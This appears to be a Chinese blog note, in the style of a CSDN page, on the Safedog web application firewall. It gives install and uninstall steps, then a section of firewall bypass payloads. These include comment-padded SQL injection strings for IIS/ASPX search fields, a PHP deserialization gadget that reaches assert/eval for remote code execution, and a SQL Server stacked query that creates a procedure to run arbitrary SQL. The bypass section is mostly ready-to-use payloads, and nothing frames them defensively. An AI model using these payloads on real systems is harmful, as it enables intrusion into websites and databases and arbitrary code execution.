安装 - Linux
下载 http://download.safedog.cn/safedog_linux64.tar.gz wget http://download.safedog.cn/safedog_linux64.tar.gz 解压 tar xvf safedog_linux64.tar 运行 ./install.py 卸载 进入安装包解压目录 chmod +x uninstall.sh ./uninstall.sh
安装 - Windows
下载 http://down.safedog.cn/download/software/safedogfwqV5.0.exe
使用指南
https://www.safedog.cn/download/software/safedogfwq_Windows_Help.pdf https://www.safedog.cn/download/software/safedogfwq_linux_Help.pdf
绕过
规则缺陷绕过 - 搜索框 + 字符型SQL注入 + IIS + ASPX + /**a*/
aspx?Pro=广x' and 1=1 -- #检测 aspx?Pro=广x' /**a*/and 1=1 -- #绕过
#遍历
aspx?Pro=广x' /**a*/union /**a*/select 1,2,3,4,5 --
aspx?Pro=广x' /**a*/and 1=(select 1) --
PHP反序列化绕过
<?php class A{ public $name; public $male; function __destruct(){ $a = $this->name; $a($this->male); } } unserialize($_POST['un']); ?> POST - un=O:1:"A":2:{s:4:"name";s:6:"assert";s:4:"male";s:16:"eval($_GET["x"])";} GET - x=phpinfo(); --结合Hackbar使用
存储过程 + SQLServer 绕过
?type=1;EXEC/*(*/student..sp_sqlexec 'CREATE PROCEDURE myexec(@s VARCHAR(1024)) as exec(@s)'
扫一扫
342
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
